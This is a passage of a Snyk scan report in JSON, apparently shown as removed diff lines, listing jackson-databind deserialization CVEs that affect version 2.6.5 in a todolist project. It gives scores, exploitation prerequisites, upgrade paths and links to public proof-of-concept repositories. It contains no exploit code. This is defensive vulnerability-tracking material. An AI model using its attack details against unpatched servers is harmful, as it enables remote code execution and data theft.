- "credit": [ - "Rui Chong" - ], - "semver": { - "vulnerable": [ - "[,2.8.11)", - "[2.9.0,2.9.4)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.8.11", - "2.9.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.8.11)", - "[2.9,2.9.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/GulajavaMinistudio/jackson-databind/pull/92/commits/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/1899", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:48.440088Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:59.857985Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:07.715996Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:48.440088Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:59.857985Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) and [CVE-2017-17485](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043)). This is exploitable via two different gadgets that bypass a blacklist.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.8.11, 2.9.4 or higher.\n## References\n- [GitHub Commit](https://github.com/GulajavaMinistudio/jackson-databind/pull/92/commits/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1899)\n", - "epssDetails": { - "percentile": "0.94704", - "probability": "0.09270", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-5968" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-w3f4-3q6j-rh82" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-01-22T15:40:18.105000Z", - "functions_new": [ - { - "version": [ - "[,2.8.11)", - "[2.9,2.9.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-01-18T15:40:18Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2018-01-23T13:17:24Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:59.857985Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.8.11" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32111", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.5)", - "[2.7.0, 2.8.11.1)", - "[2.9.0, 2.9.5)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.6.7.5", - "2.8.11.1", - "2.9.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.8.11.1)", - "[2.9.0,2.9.5)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/1931", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:58.671582Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:49.486075Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:59.859910Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:58.671582Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:49.486075Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the `c3p0` libraries are available in the classpath.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.5, 2.8.11.1, 2.9.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1931)\n", - "epssDetails": { - "percentile": "0.99133", - "probability": "0.93631", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-7489" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-cggj-fvv3-cqwv" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-02-26T15:13:40.723000Z", - "functions_new": [ - { - "version": [ - "[,2.8.11.1)", - "[2.9.0,2.9.5)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-02-10T15:13:40Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2018-02-26T15:13:40Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:49.486075Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.5" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450207", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.9.1)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.9.1", - "2.8.11.4", - "2.7.9.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.9, - "functions": [ - { - "version": [ - "[2.9.0,2.9.9.1)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2341", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/Al1ex/CVE-2019-12814", - "title": "PoC Repository" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 5.9, - "modificationTime": "2024-03-11T09:53:36.647712Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:50.077144Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:15.371549Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:36.647712Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:50.077144Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x through 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has JDOM 1.x or 2.x jar in the classpath, an attacker can send a specifically crafted JSON message that allows them to read arbitrary local files on the server.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.1, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2341)\n- [PoC Repository](https://github.com/Al1ex/CVE-2019-12814)\n", - "epssDetails": { - "percentile": "0.87218", - "probability": "0.01539", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-12814" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-cmfg-87vq-g5g4" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-06-19T15:28:46.421239Z", - "functions_new": [ - { - "version": [ - "[2.9.0,2.9.9.1)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-06-19T14:34:16Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-06-19T14:34:16Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:50.077144Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.7.9.6" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450917", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", - "credit": [ - "College of software Nankai University" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.9.1)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ] - }, - "exploit": "High", - "fixedIn": [ - "2.9.9.1", - "2.8.11.4", - "2.7.9.6" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable when the feature Polymorphic Type Handling (PTH) is enabled." - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.9.0,2.9.9.1)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html", - "title": "Debian Security Announcement" - }, - { - "url": "https://github.com/jas502n/CVE-2019-12384", - "title": "Exploit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java", - "title": "Github Fix" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2334", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Jackson CVEs Don't Panic - Blog" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/release-notes/VERSION-2.x", - "title": "Release Notes" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 5.9, - "modificationTime": "2024-03-11T09:53:36.645685Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:50.734463Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:04:45.683422Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:36.645685Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:50.734463Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data which allows attackers to have a variety of impacts by leveraging failure to block the `logback-core` class from polymorphic deserialization. Depending on the `classpath` content, remote code execution may be possible.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.1, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [Debian Security Announcement](https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html)\n- [Exploit](https://github.com/jas502n/CVE-2019-12384)\n- [Github Fix](https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2334)\n- [Jackson CVEs Don't Panic - Blog](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [Release Notes](https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/release-notes/VERSION-2.x)\n", - "epssDetails": { - "percentile": "0.97607", - "probability": "0.53288", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-12384" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-mph4-vhrx-mv67" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-06-25T10:06:54.889582Z", - "functions_new": [ - { - "version": [ - "[2.9.0,2.9.9.1)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-05-28T10:27:59Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-06-25T10:26:29Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:50.734463Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.7.9.6" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.9.2)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.9.2", - "2.8.11.4", - "2.7.9.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.9.0,2.9.9.2)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2", - "title": "GitHub Comparison" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2387", - "title": "GitHub Issue" - }, - { - "url": 